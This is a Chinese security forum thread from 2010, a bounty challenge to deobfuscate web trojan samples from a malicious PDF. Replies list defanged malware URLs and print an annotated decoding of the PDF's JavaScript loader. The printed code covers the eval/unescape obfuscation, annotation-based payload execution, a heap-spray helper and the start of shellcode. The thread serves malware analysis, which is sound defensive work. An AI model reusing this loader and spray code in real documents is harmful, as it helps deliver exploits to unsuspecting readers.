瑞星卡卡安全论坛技术交流区恶意网站交流 网马解密悬赏第五十期(已结束)

1   1  /  1  页   跳转

[悬赏] 网马解密悬赏第五十期(已结束)

网马解密悬赏第五十期(已结束)



引用:
解密文件见附件!




引用:
规则:1.一次解完并附解密日志和步骤(包含swf和pdf网马),奖赏10威望,如果部分解出,每步奖赏2威望;
            2.对于积极参与此活动会员,并多次中奖者,我们可以诚邀加入卡卡反病毒小组

 

引用:
解密工具:
  Freshow(中文版)
  Redoce(中文版)
  Malzilla (汉化版)

     
 

引用:
在线解析站点:
        http://glacierlk.cn/openlab/jm.htm
        http://www.cha88.cn/

   

引用:
注:论坛所有会员均可参加,严禁使用md的自动解密功能


   

引用:
恶意网址来源瑞星全功能安全软件拦截到真实有效的地址


用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)

附件附件:

文件名:1.rar
下载次数:11042
文件类型:application/octet-stream
文件大小:
上传时间:2010-7-1 15:36:23
描述:rar

最后编辑networkedition 最后编辑于 2010-07-02 10:40:42
分享到:
gototop
 

回复:网马解密悬赏第五十期



hxxp://bahed.in/x/l.php?s=email_iex&
hxxp://bahed.in/x/l.php?s=gicon_iex&
hxxp://bahed.in/x/l.php?s=newp_&
hxxp://bahed.in/x/l.php?s=printf_iex&


本帖被评分 1 次
gototop
 

回复:网马解密悬赏第五十期

把1.pdf 记事本打开 把j改成\  16进制解密
gototop
 

回复:网马解密悬赏第五十期

地址就是上面的地址了 版主够缺啦 弄这么大的文件卡死好几回.... 多亏坚持了...

下面的这段不知道什么意思了...
XPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
gototop
 

回复:网马解密悬赏第五十期



//第一部分

var nu_skoree_eta_svoboda_s = "777e7".substr(3,1); //e
var xx=["0","ee%xxjkjkjkkjkj","wss","9","ccc"];
var zz=xx[1].substr(2,1); //%
var nu_skoree_eta_svoboda_s2 = "replace";
var nu_skoree_eta_svoboda_sx = "vzl";
var ZjELIFipma17 = this["eval"]; 

function nu_skoree_eta_svoboda_sh999()
{ nu_skoree_eta_svoboda_sx = "unzzzzzap";  }         
var axzv="";       
if (nu_skoree_eta_svoboda_s=="e") var af="function ";         
for (jjj = 0; jjj < 999; jjj ++ )
{         
    if (nu_skoree_eta_svoboda_s=="e") 
    axzv+=af+"nu_skoree_eta_svoboda_sh"+(jjj+4-2-2)+"(){nu_skoree_eta_svoboda_sh"+(jjj+6-3-2)+"()"+""+";}"+""+"      ";
    /*
    function nu_skoree_eta_svoboda_sh0()
    {
        nu_skoree_eta_svoboda_sh1();
    }
    这样的函数名,一直到nu_skoree_eta_svoboda_sh999()
    */
}         
ZjELIFipma17(""+axzv+"nu_skoree_eta_svoboda_sh0();");//eval执行
var TTEvprOpJr18 = this[nu_skoree_eta_svoboda_sx[nu_skoree_eta_svoboda_s2]("z"+"z"+"z"+"z"+"z","e"+"s"+"c")+nu_skoree_eta_svoboda_s]; 
//replace成unescape
var gdbWnSzRdY15 = /j/gi;//这个时候面replace要用到的东西
var nu_skoree_eta_svoboda_s4 = "j76j61j72j20j65j41j6Fj44j74j6Bj44j6Ej41j59j37j37j7Aj20j3Dj20j61j70j70j3Bj76j61j72j20j64j79j69j57j72j4Ej41j51j41j68j31j30j20j3Dj20j65j41j6Fj44j74j6Bj44j6Ej41j59j37j37j7Aj2Ej64j6Fj63j3Bj64j79j69j57j72j4Ej41j51j41j68j31j30j2Ej73j79j6Ej63j41j6Ej6Ej6Fj74j53j63j61j6Ej28j29j3Bj76j61j72j20j6Bj4Cj70j65j6Bj66j49j43j59j4Bj34j20j3Dj20j64j79j69j57j72j4Ej41j51j41j68j31j30j2Ej67j65j74j41j6Ej6Ej6Fj74j73j28j30j29j3Bj76j61j72j20j43j75j70j4Aj68j77j76j75j68j4Dj35j20j3Dj20j6Bj4Cj70j65j6Bj66j49j43j59j4Bj34j5Bj30j5Dj2Ej73j75j62j6Aj65j63j74j3Bj76j61j72j20j57j47j73j77j77j5Aj4Aj62j50j68j36j20j3Dj20j43j75j70j4Aj68j77j76j75j68j4Dj35j2Ej72j65j70j6Cj61j63j65j28j67j64j62j57j6Ej53j7Aj52j64j59j31j35j2Cj22j25j22j29j3Bj76j61j72j20j44j41j73j74j65j64j59j6Dj67j78j37j3Dj54j54j45j76j70j72j4Fj70j4Aj72j31j38j28j54j54j45j76j70j72j4Fj70j4Aj72j31j38j28j57j47j73j77j77j5Aj4Aj62j50j68j36j29j29j3Bj65j76j61j6Cj28j44j41j73j74j65j64j59j6Dj67j78j37j29j3B";
ZjELIFipma17/*eval*/(TTEvprOpJr18/*unescape*/(nu_skoree_eta_svoboda_s4[nu_skoree_eta_svoboda_s2/*replace*/](gdbWnSzRdY15/*/j/gi*/,zz/*%*/)));

//第二部分

var eAoDtkDnAY77z = app;
var dyiWrNAQAh10 = eAoDtkDnAY77z.doc;
dyiWrNAQAh10.syncAnnotScan();
var kLpekfICYK4 = dyiWrNAQAh10.getAnnots(0);
var CupJhwvuhM5 = kLpekfICYK4[0].subject;
var WGswwZJbPh6 = CupJhwvuhM5.replace(gdbWnSzRdY15,"%"); //这部分解密看第三部分
var DAstedYmgx7=TTEvprOpJr18(TTEvprOpJr18(WGswwZJbPh6));
eval(DAstedYmgx7);//这个是执行shellcode部分了,是最后执行的过程

//第三部分,处理这部分
/*
<<
/Length 180891
>>
stream
j25j30j41j25j36j36j25j37j35j25j36j45j25j36j33j25j37j34j25j36j39j25j36j46j25j36j45j25j32j30j25j36j36j25j36j39j25j37j38j25j35j46j25j36j39j25j37j34j25j32j38j25j37j39j25j36j31j25j37j32j25j37j33j25j37j30j25j32j43j25j32j30j25j36
还是那个replace函数,j->%然后解密,就出现以下部分了

function fix_it(yarsp, len){
  while (yarsp.length * 2 < len){
    yarsp += yarsp;
  }
  yarsp = yarsp.substring(0, len / 2);
  return yarsp;
}
function util_printf(){
  var payload = unescape("
%uE890%u034D%u0000%u0068%u0020%u6A00%uFF00%uB9D0%u0800%u0000%uF88B%u05EB%uF35E%uFFA4%uE8D0
%uFFF6%uFFFF%u54E8%u0003%u8B00(shellcode太多,不写了,接下来的shellcode解密就都会了)
*/


本帖被评分 2 次
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT